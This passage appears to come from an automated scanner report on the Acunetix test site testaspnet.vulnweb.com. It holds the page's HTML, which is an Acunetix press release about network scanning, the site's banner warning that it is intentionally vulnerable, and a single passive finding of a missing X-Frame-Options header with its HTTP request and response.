uIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAg